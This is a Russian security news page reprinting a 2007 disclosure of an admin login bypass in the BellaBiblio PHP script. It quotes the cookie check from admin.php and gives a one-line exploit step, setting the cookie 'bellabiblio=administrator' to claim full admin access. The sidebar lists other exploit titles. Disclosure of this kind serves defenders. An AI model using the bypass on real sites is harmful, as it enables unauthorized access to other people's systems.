Информационная безопасность

Уведомление о безопасности: BellaBiblio Admin Login Bypass
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  BellaBook Admin Bypass/Remote Code Execution

  RFI ====> vBulletin v3.6.5

  Dora Emlak Script v1.0 (tr) Admin Login ByPass

  phpVoter v0.6 Remote File Include Vulnerability

From:ilkerKandemir_(at)_mynet.com <ilkerKandemir_(at)_mynet.com>
Date:31 июля 2007 г.
Subject:BellaBiblio Admin Login Bypass

BellaBiblio Admin Login Bypass

SCRIPT: BellaBiblio

DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip

AUTHOR: ilker kandemir <ilkerkandemir[at]mynet.com>

Bug in;(admin.php)
if (isset($_COOKIE['bellabiblio'])) {
   if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) {
       if (isset($_GET['ap'])) $page = $_GET['ap']; else $page = "";

EXPLOIT:

Set your cookie: bellabiblio=administrator   http:/site.com/admin.php
And you have full admin access
О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 


Rating@Mail.ru
test server